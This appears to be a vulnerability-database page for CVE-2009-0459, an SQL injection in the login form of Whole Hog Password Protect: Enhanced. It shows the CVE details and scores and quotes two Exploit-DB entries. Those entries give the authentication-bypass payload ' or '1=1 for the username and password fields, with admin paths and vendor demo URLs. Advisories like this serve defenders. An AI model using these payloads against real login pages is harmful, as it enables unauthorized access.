CVE-2009-0459
published 2009-02-10CVE-2009-0459: Multiple SQL injection vulnerabilities in admin/login_submit.php in Whole Hog Password Protect: Enhanced 1.x allow remote attackers to execute arbitrary SQL…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.14%
79.8th percentile
Multiple SQL injection vulnerabilities in admin/login_submit.php in Whole Hog Password Protect: Enhanced 1.x allow remote attackers to execute arbitrary SQL commands via (1) the uid parameter (aka Username field) or (2) the pwd parameter (aka Password field). NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wholehogsoftware | password_protect | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WholeHogSoftware Ware Support - Authentication Bypass
exploitdb·2009-02-02
CVE-2009-0459 WholeHogSoftware Ware Support - Authentication Bypass
WholeHogSoftware Ware Support - Authentication Bypass
---
#############################################
#----C4TEAM.ORG---ByALBAYX----C4TEAM.ORG----#
#############################################
[~]Author : ByALBAYX
[~]Website : WWW.C4TEAM.ORG
#############################################
[~]Script :Ware Support
[~]Site :http://wholehogsoftware.com
[~]Price :$20.00
[~]Detay :http://wholehogsoftware.com/index.php/page/ware_support
#############################################
[~]....
[~]Admin Path :http://c4team.org / [Ware Support_PATH] /admin/
[~]Username : ' or '1=1
[~]Password : ' or '1=1
[~]Demo :http://www.wholehogsoftware.com/demo/support/admin/
[~].... vs..
#############################################
[~]iSiNiZE BAqIN :=)
[~]Greetz For C4TEAM Members
[~]Bir insan
Exploit-DB
WholeHogSoftware Password Protect - Authentication Bypass
exploitdb·2009-02-02
CVE-2009-0459 WholeHogSoftware Password Protect - Authentication Bypass
WholeHogSoftware Password Protect - Authentication Bypass
---
#############################################
#----C4TEAM.ORG---ByALBAYX----C4TEAM.ORG----#
#############################################
[~]Author : ByALBAYX
[~]Website : WWW.C4TEAM.ORG
#############################################
[~]Script :Password Protect
[~]Site :http://wholehogsoftware.com
[~]Price :$20.00
[~]Detay :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced
#############################################
[~]....
[~]Admin Path :http://c4team.org / [Password Protect_PATH] /admin/
[~]Username : ' or '1=1
[~]Password : ' or '1=1
[~]Demo :http://www.wholehogsoftware.com/demo/password_protect_enhanced/admin
[~].... vs..
#############################################
[~]iSiNiZE BAqIN :
No writeups or analysis indexed.
2009-02-10
Published